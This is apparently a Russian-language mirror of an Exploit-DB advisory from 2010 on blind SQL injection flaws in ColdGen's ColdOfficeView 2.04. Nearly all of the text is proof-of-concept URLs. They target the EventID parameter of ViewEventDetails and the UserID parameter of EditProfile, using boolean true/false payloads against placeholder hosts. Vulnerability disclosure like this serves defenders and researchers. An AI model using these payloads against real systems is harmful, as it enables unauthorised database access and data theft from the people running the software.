- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14934
- Проверка EDB
-
- Пройдено
- Автор
- MR_ME
- Тип уязвимости
- WEBAPPS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2010-09-07
ColdOfficeView 2.04 - Multiple Blind SQL Injections
Код:
# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)
PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false
2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false- Источник
- www.exploit-db.com
